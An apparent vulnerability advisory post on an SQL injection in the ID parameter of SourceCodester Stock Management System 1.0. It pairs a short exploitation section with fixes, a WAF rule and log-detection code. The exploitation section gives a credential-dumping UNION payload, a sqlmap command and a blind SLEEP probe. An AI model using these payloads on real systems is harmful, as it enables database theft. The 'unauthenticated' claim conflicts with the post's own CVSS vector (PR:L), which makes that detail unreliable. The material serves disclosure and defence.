SourceCodester Stock Management System 1.0, SQL Injection, CVE-2025-4806 (Critical)


How CVE-2025-4806 Works

The vulnerability is improper input sanitization in the `/admin/?page=back_order/view_bo` endpoint of SourceCodester Stock Management System 1.0. The `ID` parameter is concatenated directly into an SQL query without validation, so an attacker can inject SQL through it. Remote attackers can manipulate this parameter to execute arbitrary database commands, potentially compromising sensitive data, bypassing authentication, or gaining admin privileges. The root cause is the absence of prepared statements or parameterized queries in the PHP backend.

DailyCVE Form

Platform: SourceCodester
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/28/2025

Prediction: Patch by 06/15/2025

What Undercode Says:

Exploitation

1. Payload Example:

/admin/?page=back_order/view_bo&ID=1' UNION SELECT 1,2,3,4,5,CONCAT(username,':',password),7 FROM users-- -

2. Automated Exploit:

sqlmap -u "http://target.com/admin/?page=back_order/view_bo&ID=1" --risk=3 --level=5

3. Blind SQLi Detection:

/admin/?page=back_order/view_bo&ID=1' AND (SELECT SLEEP(5))-- -

Mitigation

1. Patch Workaround:

$id = mysqli_real_escape_string($conn, $_GET['ID']); // Temporary fix: only protects a value that is quoted in the SQL string; a bare numeric ID still needs a cast or a prepared statement

2. Full Fix:

$stmt = $conn->prepare("SELECT * FROM back_orders WHERE id = ?");
$stmt->bind_param("i", $_GET['ID']); // "i" binds the value as an integer, so no SQL text can be injected
$stmt->execute();
$result = $stmt->get_result();

3. WAF Rule:

location /admin/ {
    modsecurity on;
    modsecurity_rules 'SecRule ARGS_GET "@detectSQLi" "id:1000,phase:2,deny,status:403"';
}

Analytics

  • Attack Surface: Remote, unauthenticated
  • CVSS 4.0: AV:N/AC:L/PR:L/UI:N/VC:L/VI:L/VA:L
  • Exploitability: Public PoC available
  • Impact: Full database compromise

Detection Commands

grep -rn "\$_GET\['ID'\]" /var/www/html/admin/   # Find vulnerable files (escape $ so the shell does not expand it)

Log Analysis

SELECT * FROM apache_logs WHERE request LIKE '%view_bo%ID=%\%27%'; -- \% matches a literal percent sign (a URL-encoded quote after ID=)
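
The same check run directly over Apache access-log lines, as an added example that is not part of the original post: it parses each request line, decodes the query string (twice, to catch double-encoding) and flags every `view_bo` request whose `ID` is not a plain integer, since the endpoint only ever expects a numeric ID. The log format and sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache "combined" log format; only the client IP, timestamp and request target are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def suspicious_requests(lines):
    """Return (ip, timestamp, decoded ID value) for each view_bo request whose
    ID is anything other than an unsigned integer. Any non-numeric value is
    either a probe or an injection attempt against this endpoint."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip lines that are not in the expected format
        parts = urlsplit(m.group("target"))
        if not parts.path.startswith("/admin/"):
            continue
        qs = parse_qs(parts.query, keep_blank_values=True)   # first percent-decoding happens here
        if qs.get("page", [""])[0] != "back_order/view_bo":
            continue
        for raw in qs.get("ID", []):
            value = unquote(raw)          # decode a second time to catch double-encoded payloads
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((m.group("ip"), m.group("ts"), value))
    return hits

# Constructed sample lines (not real traffic): one legitimate lookup, the page's
# blind-SQLi probe, a double-encoded quote, and an unrelated admin page.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/May/2025:10:01:02 +0000] "GET /admin/?page=back_order/view_bo&ID=7 HTTP/1.1" 200 1523',
    '203.0.113.9 - - [28/May/2025:10:01:09 +0000] "GET /admin/?page=back_order/view_bo&ID=1%27%20AND%20(SELECT%20SLEEP(5))--%20- HTTP/1.1" 200 1523',
    '203.0.113.9 - - [28/May/2025:10:01:15 +0000] "GET /admin/?page=back_order/view_bo&ID=1%2527 HTTP/1.1" 200 1523',
    '198.51.100.2 - - [28/May/2025:10:02:00 +0000] "GET /admin/?page=home HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for ip, ts, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ts} {ip} ID={value!r}")
```

Feed it the real access log with `suspicious_requests(open("/var/log/apache2/access.log"))` to list the offending source addresses and timestamps.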

Backup Restoration

mysqldump -u root -p stock_db > backup_prepatch.sql

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode